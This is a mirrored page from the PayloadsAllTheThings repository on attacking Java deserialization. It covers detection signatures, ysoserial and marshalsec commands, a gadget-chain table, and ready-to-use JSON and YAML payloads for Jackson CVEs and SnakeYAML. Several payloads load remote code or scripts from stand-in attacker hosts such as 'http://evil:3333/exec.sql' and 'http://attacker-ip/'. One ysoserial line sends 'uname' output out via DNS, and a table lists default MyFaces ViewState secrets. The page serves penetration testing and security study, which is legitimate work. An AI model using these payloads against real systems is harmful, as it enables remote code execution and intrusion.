java.md (25011B)
1 --- 2 title: "Java Deserialization" 3 topic: "Insecure Deserialization" 4 topicSlug: "insecure-deserialization" 5 sourcePath: "Insecure Deserialization/Java.md" 6 sourceUrl: "https://github.com/swisskyrepo/PayloadsAllTheThings/blob/3ac27901c711/Insecure%20Deserialization/Java.md" 7 sha: "3ac27901c711" 8 isReadme: false 9 --- 10 11 # Java Deserialization 12 13 > Java serialization is the process of converting a Java object’s state into a byte stream, which can be stored or transmitted and later reconstructed (deserialized) back into the original object. Serialization in Java is primarily done using the `Serializable` interface, which marks a class as serializable, allowing it to be saved to files, sent over a network, or transferred between JVMs. 14 15 ## Summary 16 17 * [Detection](#detection) 18 * [Tools](#tools) 19 * [Ysoserial](#ysoserial) 20 * [Burp extensions using ysoserial](#burp-extensions) 21 * [Alternative Tooling](#alternative-tooling) 22 * [YAML Deserialization](#yaml-deserialization) 23 * [ViewState](#viewstate) 24 * [References](#references) 25 26 ## Detection 27 28 * `"AC ED 00 05"` in Hex 29 * `AC ED`: STREAM_MAGIC. Specifies that this is a serialization protocol. 30 * `00 05`: STREAM_VERSION. The serialization version. 31 * `"rO0"` in Base64 32 * `Content-Type` = "application/x-java-serialized-object" 33 * `"H4sIAAAAAAAAAJ"` in gzip(base64) 34 35 ## Tools 36 37 ### Ysoserial 38 39 [frohoff/ysoserial](https://github.com/frohoff/ysoserial) : A proof-of-concept tool for generating payloads that exploit unsafe Java object deserialization. 40 41 ```java 42 java -jar ysoserial.jar CommonsCollections1 calc.exe > commonpayload.bin 43 java -jar ysoserial.jar Groovy1 calc.exe > groovypayload.bin 44 java -jar ysoserial.jar Groovy1 'ping 127.0.0.1' > payload.bin 45 java -jar ysoserial.jar Jdk7u21 bash -c 'nslookup `uname`.[redacted]' | gzip | base64 46 ``` 47 48 **List of payloads included in ysoserial:** 49 50 | Payload | Authors | Dependencies | 51 | ------------------- | -------------------------------------- | ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | 52 | AspectJWeaver | @Jang | aspectjweaver:1.9.2, commons-collections:3.2.2 | 53 | BeanShell1 | @pwntester, @cschneider4711 | bsh:2.0b5 | 54 | C3P0 | @mbechler | c3p0:0.9.5.2, mchange-commons-java:0.2.11 | 55 | Click1 | @artsploit | click-nodeps:2.3.0, javax.servlet-api:3.1.0 | 56 | Clojure | @JackOfMostTrades | clojure:1.8.0 | 57 | CommonsBeanutils1 | @frohoff | commons-beanutils:1.9.2, commons-collections:3.1, commons-logging:1.2 | 58 | CommonsCollections1 | @frohoff | commons-collections:3.1 | 59 | CommonsCollections2 | @frohoff | commons-collections4:4.0 | 60 | CommonsCollections3 | @frohoff | commons-collections:3.1 | 61 | CommonsCollections4 | @frohoff | commons-collections4:4.0 | 62 | CommonsCollections5 | @matthias_kaiser, @jasinner | commons-collections:3.1 | 63 | CommonsCollections6 | @matthias_kaiser | commons-collections:3.1 | 64 | CommonsCollections7 | @scristalli, @hanyrax, @EdoardoVignati | commons-collections:3.1 | 65 | FileUpload1 | @mbechler | commons-fileupload:1.3.1, commons-io:2.4 | 66 | Groovy1 | @frohoff | groovy:2.3.9 | 67 | Hibernate1 | @mbechler | | 68 | Hibernate2 | @mbechler | | 69 | JBossInterceptors1 | @matthias_kaiser | javassist:3.12.1.GA, jboss-interceptor-core:2.0.0.Final, cdi-api:1.0-SP1, javax.interceptor-api:3.1, jboss-interceptor-spi:2.0.0.Final, slf4j-api:1.7.21 | 70 | JRMPClient | @mbechler | | 71 | JRMPListener | @mbechler | | 72 | JSON1 | @mbechler | json-lib:jar:jdk15:2.4, spring-aop:4.1.4.RELEASE, aopalliance:1.0, commons-logging:1.2, commons-lang:2.6, ezmorph:1.0.6, commons-beanutils:1.9.2, spring-core:4.1.4.RELEASE, commons-collections:3.1 | 73 | JavassistWeld1 | @matthias_kaiser | javassist:3.12.1.GA, weld-core:1.1.33.Final, cdi-api:1.0-SP1, javax.interceptor-api:3.1, jboss-interceptor-spi:2.0.0.Final, slf4j-api:1.7.21 | 74 | Jdk7u21 | @frohoff | | 75 | Jython1 | @pwntester, @cschneider4711 | jython-standalone:2.5.2 | 76 | MozillaRhino1 | @matthias_kaiser | js:1.7R2 | 77 | MozillaRhino2 | @_tint0 | js:1.7R2 | 78 | Myfaces1 | @mbechler | | 79 | Myfaces2 | @mbechler | | 80 | ROME | @mbechler | rome:1.0 | 81 | Spring1 | @frohoff | spring-core:4.1.4.RELEASE, spring-beans:4.1.4.RELEASE | 82 | Spring2 | @mbechler | spring-core:4.1.4.RELEASE, spring-aop:4.1.4.RELEASE, aopalliance:1.0, commons-logging:1.2 | 83 | URLDNS | @gebl | | 84 | Vaadin1 | @kai_ullrich | vaadin-server:7.7.14, vaadin-shared:7.7.14 | 85 | Wicket1 | @jacob-baines | wicket-util:6.23.0, slf4j-api:1.6.4 | 86 87 ### Burp extensions 88 89 * [NetSPI/JavaSerialKiller](https://github.com/NetSPI/JavaSerialKiller) - Burp extension to perform Java Deserialization Attacks 90 * [federicodotta/Java Deserialization Scanner](https://github.com/federicodotta/Java-Deserialization-Scanner) - All-in-one plugin for Burp Suite for the detection and the exploitation of Java deserialization vulnerabilities 91 * [summitt/burp-ysoserial](https://github.com/summitt/burp-ysoserial) - YSOSERIAL Integration with Burp Suite 92 * [DirectDefense/SuperSerial](https://github.com/DirectDefense/SuperSerial) - Burp Java Deserialization Vulnerability Identification 93 * [DirectDefense/SuperSerial-Active](https://github.com/DirectDefense/SuperSerial-Active) - Java Deserialization Vulnerability Active Identification Burp Extender 94 95 ### Alternative Tooling 96 97 * [pwntester/JRE8u20_RCE_Gadget](https://github.com/pwntester/JRE8u20_RCE_Gadget) - Pure JRE 8 RCE Deserialization gadget 98 * [joaomatosf/JexBoss](https://github.com/joaomatosf/jexboss) - JBoss (and others Java Deserialization Vulnerabilities) verify and EXploitation Tool 99 * [pimps/ysoserial-modified](https://github.com/pimps/ysoserial-modified) - A fork of the original ysoserial application 100 * [NickstaDB/SerialBrute](https://github.com/NickstaDB/SerialBrute) - Java serialization brute force attack tool 101 * [NickstaDB/SerializationDumper](https://github.com/NickstaDB/SerializationDumper) - A tool to dump Java serialization streams in a more human readable form 102 * [bishopfox/gadgetprobe](https://labs.bishopfox.com/gadgetprobe) - Exploiting Deserialization to Brute-Force the Remote Classpath 103 * [k3idii/Deserek](https://github.com/k3idii/Deserek) - Python code to Serialize and Unserialize java binary serialization format. 104 105 ```java 106 java -jar ysoserial.jar URLDNS http://xx.yy > yss_base.bin 107 python deserek.py yss_base.bin --format python > yss_url.py 108 python yss_url.py yss_new.bin 109 java -cp JavaSerializationTestSuite DeSerial yss_new.bin 110 ``` 111 112 * [mbechler/marshalsec](https://github.com/mbechler/marshalsec) - Java Unmarshaller Security - Turning your data into code execution 113 114 ```java 115 $ java -cp marshalsec.jar marshalsec.<Marshaller> [-a] [-v] [-t] [<gadget_type> [<arguments...>]] 116 $ java -cp marshalsec.jar marshalsec.JsonIO Groovy "cmd" "/c" "calc" 117 $ java -cp marshalsec.jar marshalsec.jndi.LDAPRefServer http://localhost:8000\#exploit.JNDIExploit 1389 118 // -a - generates/tests all payloads for that marshaller 119 // -t - runs in test mode, unmarshalling the generated payloads after generating them. 120 // -v - verbose mode, e.g. also shows the generated payload in test mode. 121 // gadget_type - Identifier of a specific gadget, if left out will display the available ones for that specific marshaller. 122 // arguments - Gadget specific arguments 123 ``` 124 125 Payload generators for the following marshallers are included: 126 127 | Marshaller | Gadget Impact | 128 | --------------------------- | ---------------------------------------------------------------------------- | 129 | BlazeDSAMF(0|3|X) | JDK only escalation to Java serialization various third party libraries RCEs | 130 | Hessian|Burlap | various third party RCEs | 131 | Castor | dependency library RCE | 132 | Jackson | **possible JDK only RCE**, various third party RCEs | 133 | Java | yet another third party RCE | 134 | JsonIO | **JDK only RCE** | 135 | JYAML | **JDK only RCE** | 136 | Kryo | third party RCEs | 137 | KryoAltStrategy | **JDK only RCE** | 138 | Red5AMF(0|3) | **JDK only RCE** | 139 | SnakeYAML | **JDK only RCEs** | 140 | XStream | **JDK only RCEs** | 141 | YAMLBeans | third party RCE | 142 143 ## JSON Deserialization 144 145 Multiple libraries can be used to handle JSON in Java. 146 147 * [json-io](https://github.com/GrrrDog/Java-Deserialization-Cheat-Sheet#json-io-json) 148 * [Jackson](https://github.com/GrrrDog/Java-Deserialization-Cheat-Sheet#jackson-json) 149 * [Fastjson](https://github.com/GrrrDog/Java-Deserialization-Cheat-Sheet#fastjson-json) 150 * [Genson](https://github.com/GrrrDog/Java-Deserialization-Cheat-Sheet#genson-json) 151 * [Flexjson](https://github.com/GrrrDog/Java-Deserialization-Cheat-Sheet#flexjson-json) 152 * [Jodd](https://github.com/GrrrDog/Java-Deserialization-Cheat-Sheet#jodd-json) 153 154 **Jackson**: 155 156 Jackson is a popular Java library used for working with JSON (JavaScript Object Notation) data. 157 Jackson-databind supports Polymorphic Type Handling (PTH), formerly known as "Polymorphic Deserialization", which is disabled by default. 158 159 To determine if the backend is using Jackson, the most common technique is to send an invalid JSON and inspect the error message. Look for references to either of those: 160 161 ```java 162 Validation failed: Unhandled Java exception: com.fasterxml.jackson.databind.exc.MismatchedInputException: Unexpected token (START_OBJECT), expected START_ARRAY: need JSON Array to contain As.WRAPPER_ARRAY type information for class java.lang.Object 163 ``` 164 165 * com.fasterxml.jackson.databind 166 * org.codehaus.jackson.map 167 168 **Exploitation**: 169 170 * **CVE-2017-7525** 171 172 ```json 173 { 174 "param": [ 175 "com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl", 176 { 177 "transletBytecodes": [ 178 "yv66v[JAVA_CLASS_B64_ENCODED]AIAEw==" 179 ], 180 "transletName": "a.b", 181 "outputProperties": {} 182 } 183 ] 184 } 185 ``` 186 187 * **CVE-2017-17485** 188 189 ```json 190 { 191 "param": [ 192 "org.springframework.context.support.FileSystemXmlApplicationContext", 193 "http://evil/spel.xml" 194 ] 195 } 196 ``` 197 198 * **CVE-2019-12384** 199 200 ```json 201 [ 202 "ch.qos.logback.core.db.DriverManagerConnectionSource", 203 { 204 "url":"jdbc:h2:mem:;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM 'http://localhost:8000/inject.sql'" 205 } 206 ] 207 ``` 208 209 * **CVE-2020-36180** 210 211 ```json 212 [ 213 "org.apache.commons.dbcp2.cpdsadapter.DriverAdapterCPDS", 214 { 215 "url":"jdbc:h2:mem:;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM 'http://evil:3333/exec.sql'" 216 } 217 ] 218 ``` 219 220 * **CVE-2020-9548** 221 222 ```json 223 [ 224 "br.com.anteros.dbcp.AnterosDBCPConfig", 225 { 226 "healthCheckRegistry": "ldap://{{interactsh-url}}" 227 } 228 ] 229 ``` 230 231 ## YAML Deserialization 232 233 * [SnakeYAML](https://github.com/GrrrDog/Java-Deserialization-Cheat-Sheet#snakeyaml-yaml) 234 * [jYAML](https://github.com/GrrrDog/Java-Deserialization-Cheat-Sheet#jyaml-yaml) 235 * [YamlBeans](https://github.com/GrrrDog/Java-Deserialization-Cheat-Sheet#yamlbeans-yaml) 236 237 **SnakeYAML**: 238 239 SnakeYAML is a popular Java-based library used for parsing and emitting YAML (YAML Ain't Markup Language) data. It provides an easy-to-use API for working with YAML, a human-readable data serialization standard commonly used for configuration files and data exchange. 240 241 ```yaml 242 !!javax.script.ScriptEngineManager [ 243 !!java.net.URLClassLoader [[ 244 !!java.net.URL ["http://attacker-ip/"] 245 ]] 246 ] 247 ``` 248 249 ## ViewState 250 251 In Java, ViewState refers to the mechanism used by frameworks like JavaServer Faces (JSF) to maintain the state of UI components between HTTP requests in web applications. There are 2 major implementations: 252 253 * Oracle Mojarra (JSF reference implementation) 254 * Apache MyFaces 255 256 **Tools**: 257 258 * [joaomatosf/jexboss](https://github.com/joaomatosf/jexboss) - JexBoss: Jboss (and Java Deserialization Vulnerabilities) verify and EXploitation Tool 259 * [Synacktiv-contrib/inyourface](https://github.com/Synacktiv-contrib/inyourface) - InYourFace is a software used to patch unencrypted and unsigned JSF ViewStates. 260 261 ### Encoding 262 263 | Encoding | Starts with | 264 | ------------- | ----------- | 265 | base64 | `rO0` | 266 | base64 + gzip | `H4sIAAA` | 267 268 ### Storage 269 270 The `javax.faces.STATE_SAVING_METHOD` is a configuration parameter in JavaServer Faces (JSF). It specifies how the framework should save the state of a component tree (the structure and data of UI components on a page) between HTTP requests. 271 272 The storage method can also be inferred from the viewstate representation in the HTML body. 273 274 * **Server side** storage: `value="-XXX:-XXXX"` 275 * **Client side** storage: `base64 + gzip + Java Object` 276 277 ### Encryption 278 279 By default MyFaces uses DES as encryption algorithm and HMAC-SHA1 to authenticate the ViewState. It is possible and recommended to configure more recent algorithms like AES and HMAC-SHA256. 280 281 | Encryption Algorithm | HMAC | 282 | -------------------- | --------- | 283 | DES ECB (default) | HMAC-SHA1 | 284 285 Supported encryption methods are BlowFish, 3DES, AES and are defined by a context parameter. 286 The value of these parameters and their secrets can be found inside these XML clauses. 287 288 ```xml 289 <param-name>org.apache.myfaces.MAC_ALGORITHM</param-name> 290 <param-name>org.apache.myfaces.SECRET</param-name> 291 <param-name>org.apache.myfaces.MAC_SECRET</param-name> 292 ``` 293 294 Common secrets from the [documentation](https://cwiki.apache.org/confluence/display/MYFACES2/Secure+Your+Application). 295 296 | Name | Value | 297 | -------------------- | ---------------------------------- | 298 | AES CBC/PKCS5Padding | `NzY1NDMyMTA3NjU0MzIxMA==` | 299 | DES | `NzY1NDMyMTA=<` | 300 | DESede | `MDEyMzQ1Njc4OTAxMjM0NTY3ODkwMTIz` | 301 | Blowfish | `NzY1NDMyMTA3NjU0MzIxMA` | 302 | AES CBC | `MDEyMzQ1Njc4OTAxMjM0NTY3ODkwMTIz` | 303 | AES CBC IV | `NzY1NDMyMTA3NjU0MzIxMA==` | 304 305 * **Encryption**: Data -> encrypt -> hmac_sha1_sign -> b64_encode -> url_encode -> ViewState 306 * **Decryption**: ViewState -> url_decode -> b64_decode -> hmac_sha1_unsign -> decrypt -> Data 307 308 ## References 309 310 * [Detecting deserialization bugs with DNS exfiltration - Philippe Arteau - March 22, 2017](https://web.archive.org/web/20230927142712/https://www.gosecure.net/blog/2017/03/22/detecting-deserialization-bugs-with-dns-exfiltration/) 311 * [Exploiting the Jackson RCE: CVE-2017-7525 - Adam Caudill - October 4, 2017](https://web.archive.org/web/20260303123815/https://adamcaudill.com/2017/10/04/exploiting-jackson-rce-cve-2017-7525/) 312 * [Hack The Box - Arkham - 0xRick - August 10, 2019](https://web.archive.org/web/20251125134359/https://0xrick.github.io/hack-the-box/arkham/) 313 * [How I found a $1500 worth Deserialization vulnerability - Ashish Kunwar - August 28, 2018](https://web.archive.org/web/20250918030712/https://medium.com/@D0rkerDevil/how-i-found-a-1500-worth-deserialization-vulnerability-9ce753416e0a) 314 * [Jackson CVE-2019-12384: anatomy of a vulnerability class - Andrea Brancaleoni - July 22, 2019](https://web.archive.org/web/20190724143322/https://blog.doyensec.com/2019/07/22/jackson-gadgets.html) 315 * [Jackson gadgets - Anatomy of a vulnerability - Andrea Brancaleoni - July 22, 2019](https://web.archive.org/web/20190724143322/https://blog.doyensec.com/2019/07/22/jackson-gadgets.html) 316 * [Jackson Polymorphic Deserialization - FasterXML - July 23, 2020](https://github.com/FasterXML/jackson-docs/wiki/JacksonPolymorphicDeserialization) 317 * [Java Deserialization Cheat Sheet - Aleksei Tiurin - May 23, 2023](https://github.com/GrrrDog/Java-Deserialization-Cheat-Sheet/blob/master/README.md) 318 * [Java Deserialization in ViewState - Haboob Team - December 23, 2020](https://web.archive.org/web/20250909154616/https://www.exploit-db.com/docs/48126) 319 * [JSF ViewState upside-down - Renaud Dubourguais, Nicolas Collignon - March 15, 2016](https://web.archive.org/web/20160315020109/http://synacktiv.com/ressources/JSF_ViewState_InYourFace.pdf) 320 * [Misconfigured JSF ViewStates can lead to severe RCE vulnerabilities - Peter Stöckli - August 14, 2017](https://web.archive.org/web/20181217131654/https://alphabot.com/security/blog/2017/java/Misconfigured-JSF-ViewStates-can-lead-to-severe-RCE-vulnerabilities.html) 321 * [On Jackson CVEs: Don’t Panic — Here is what you need to know - cowtowncoder - December 22, 2017](https://web.archive.org/web/20201207032909/https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062) 322 * [Pre-auth RCE in ForgeRock OpenAM (CVE-2021-35464) - Michael Stepankin (@artsploit) - June 29, 2021](https://web.archive.org/web/20260210022416/https://portswigger.net/research/pre-auth-rce-in-forgerock-openam-cve-2021-35464) 323 * [Triggering a DNS lookup using Java Deserialization - paranoidsoftware.com - July 5, 2020](https://web.archive.org/web/20250604040229/https://blog.paranoidsoftware.com/triggering-a-dns-lookup-using-java-deserialization/) 324 * [Understanding & practicing java deserialization exploits - Diablohorn - September 9, 2017](https://web.archive.org/web/20250604034046/https://diablohorn.com/2017/09/09/understanding-practicing-java-deserialization-exploits/) 325 * [Friday the 13th JSON Attacks - Alvaro Muñoz & Oleksandr Mirosh - July 28, 2017](https://web.archive.org/web/20170728193005/https://www.blackhat.com/docs/us-17/thursday/us-17-Munoz-Friday-The-13th-JSON-Attacks-wp.pdf)